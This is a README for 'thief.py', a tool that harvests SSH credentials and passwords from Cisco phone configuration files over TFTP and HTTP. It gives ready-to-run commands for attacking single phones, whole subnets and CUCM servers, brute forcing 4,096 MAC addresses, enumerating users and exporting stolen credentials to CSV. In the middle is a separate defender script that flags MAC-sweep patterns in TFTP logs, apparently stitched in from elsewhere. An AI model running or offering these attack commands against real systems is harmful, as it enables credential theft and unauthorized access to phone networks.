Multi-threaded tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials. Features intelligent caching, automatic backoff protection, and MAC address brute forcing capabilities.
- Multi-threaded downloads: 40 parallel worker threads for fast credential extraction
- Intelligent caching: SQLite database prevents redundant TFTP requests
- Automatic protocol fallback: TFTP by default with automatic HTTP fallback
- TFTP server protection: Automatic backoff manager prevents server overload
- MAC address brute forcing: Try 4,096 MAC variations (3 hex characters) per detected phone
- Gowitness integration: Load phone targets directly from gowitness database
- CSV export: Export discovered credentials to CSV format
- User enumeration: Extract usernames via CUCM User Data Services (UDS) API
Download configs from CUCM server (will attempt to get list of all phones):

    ./thief.py -H <CUCM Server IP>

Specify a phone IP address to detect CUCM and discover credentials:

    ./thief.py -p <Cisco Phone IP>

Specify multiple phones (repeatable):

    ./thief.py -p 192.168.1.10 -p 192.168.1.11 -p 192.168.1.12

Load phone targets from gowitness database:

    ./thief.py --gowitness /path/to/gowitness.sqlite3

Brute force 4,096 MAC variations for each detected phone:

    ./thief.py -p <Phone IP> -b
    ./thief.py --gowitness <DB> -b -H <CUCM Server>

Enumerate and attack entire subnet:

    ./thief.py --subnet 192.168.1.0/24

Extract usernames via CUCM UDS API:

    ./thief.py -H <CUCM Server> --userenum

View cached results:

    ./thief.py --show-db
    ./thief.py --show-db -H <CUCM Server> # Filter by CUCM

Force re-download (bypass cache):

    ./thief.py -p <Phone IP> -b --force

Use custom database file:

    ./thief.py -p <Phone IP> --db custom.db

Disable database caching:

    ./thief.py -p <Phone IP> --no-db

Export to CSV:

    ./thief.py -p <Phone IP> -b --csv results.csv

- -H, --host: Specify CUCM server IP address
- -p, --phone: Specify Cisco phone IP (repeatable for multiple targets)
- --gowitness DB_FILE: Load phone targets from gowitness SQLite database
- -e, --enumsubnet: Enumerate and attack subnet in CIDR notation
- -b, --brute-mac: Brute force MAC variations (4,096 combinations per phone)
- --force: Bypass cache and force re-download of all configuration files
- --userenum: Extract usernames via CUCM User Data Services (UDS) API
- --csv FILENAME: Export discovered credentials to CSV file
- --outfile FILENAME: Specify output file for enumerated usernames (default: cucm_users.txt)
- --db FILENAME: Specify SQLite database for caching results (default: thief.db)
- --no-db: Disable database caching and operate without persistent storage
- --show-db: Display summary of credentials stored in database and exit
- -d, --debug: Enable verbose output including all failed attempts and TFTP operations

- Target Discovery: Detects phones via direct IP, gowitness database, or subnet enumeration
- CUCM Detection: Automatically identifies CUCM server from phone configuration
- MAC Detection: Extracts MAC addresses from phone hostnames (SEP format)
- Multi-threaded Brute Force: 40 workers simultaneously try TFTP/HTTP downloads
- Cache check: Skips previously attempted files
- Backoff protection: Automatically slows down if TFTP server shows errors
- Protocol fallback: Tries TFTP first, falls back to HTTP
- Credential Extraction: Parses XML configs for SSH credentials, passwords, usernames
- Database Storage: Caches all results to prevent redundant requests
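
A defender-side check for the MAC sweep described in the steps above, as an added example that is not part of the tool or its README: it flags any TFTP client that requests many `SEP<MAC>.cnf.xml` files differing only in the last three hex digits. The log line format, the sample addresses and the threshold of 16 are constructed assumptions.

```python
import re
from collections import defaultdict

# Assumed, constructed log format: "<timestamp> <source IP> RRQ <filename>"
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+RRQ\s+(\S+)$")
# Per-phone config files are named SEP<12-hex-digit MAC>.cnf.xml
SEP_RE = re.compile(r"^SEP([0-9A-Fa-f]{12})\.cnf\.xml$")


def find_mac_sweeps(lines, threshold=16):
    """Map (source IP, 9-digit MAC prefix) -> number of distinct 3-digit
    suffixes requested, keeping only entries at or above `threshold`."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a TFTP read request in the assumed format
        _, src, filename = m.groups()
        sep = SEP_RE.match(filename)
        if not sep:
            continue  # some other file, not a per-phone config
        mac = sep.group(1).upper()
        # Repeated requests for the same file collapse in the set
        seen[(src, mac[:9])].add(mac[9:])
    return {k: len(v) for k, v in seen.items() if len(v) >= threshold}


def build_sample_log():
    """Constructed sample: one sweeping client among normal phone boots."""
    log = [
        "2024-01-01T10:00:00Z 10.0.0.21 RRQ SEP0011223344AA.cnf.xml",
        "2024-01-01T10:00:05Z 10.0.0.21 RRQ SEP0011223344AA.cnf.xml",
        "2024-01-01T10:00:07Z 10.0.0.22 RRQ SEP0011223344AB.cnf.xml",
        "2024-01-01T10:00:09Z 10.0.0.22 RRQ other-file.cfg",
        "malformed line",
    ]
    # 10.0.0.50 walks 64 consecutive suffixes under a single MAC prefix
    for i in range(64):
        log.append(f"2024-01-01T10:01:{i % 60:02d}Z 10.0.0.50 "
                   f"RRQ SEP001122334{i:03X}.cnf.xml")
    return log


if __name__ == "__main__":
    for (src, prefix), count in find_mac_sweeps(build_sample_log()).items():
        print(f"{src}: {count} distinct configs under SEP{prefix}***")
```
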

    uv sync
    uv run thief --help

Or install as a global CLI tool:

    uv tool install .
    thief --help

    pip install .
    thief --help

- Multi-threading: 40 parallel workers process 4,096 MAC variations efficiently
- Intelligent caching: Database prevents re-downloading the same files
- Automatic throttling: Backoff manager protects TFTP server from overload
- Protocol optimization: TFTP (fast) with HTTP fallback (reliable)